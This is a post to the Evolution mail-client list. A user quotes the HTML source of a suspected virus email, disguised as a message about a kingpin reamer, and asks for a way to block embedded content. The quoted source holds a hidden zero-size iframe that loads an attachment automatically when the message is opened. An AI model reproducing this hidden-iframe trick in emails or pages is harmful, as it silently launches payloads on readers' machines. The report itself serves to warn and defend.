[Evolution] [Fwd: Re: King pin reamer for Big Healeys] arning probablu virus!

So this is the source of the email I just got, the iframe opens a xmms
window of sorts to play the fake midi line.

Is this part of the new bugger virus?  If so, can we make evolution
always give me the option to downline content embedded in the email?

------------ORD5T5UQJ2Q5IQC

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:6YJkM8fab5Loo height=3D0 width=3D0>
</iframe>
<FONT></FONT>
Hi Dan,<br>
There was one stepped Austin Kingpin reamer in a used machinery
dealers<br=

shop.<br>
If you want to pay about $75 i can check to see if it is still
available.<=
br>
Steve Pike.<br>
Melbourne Australia<br>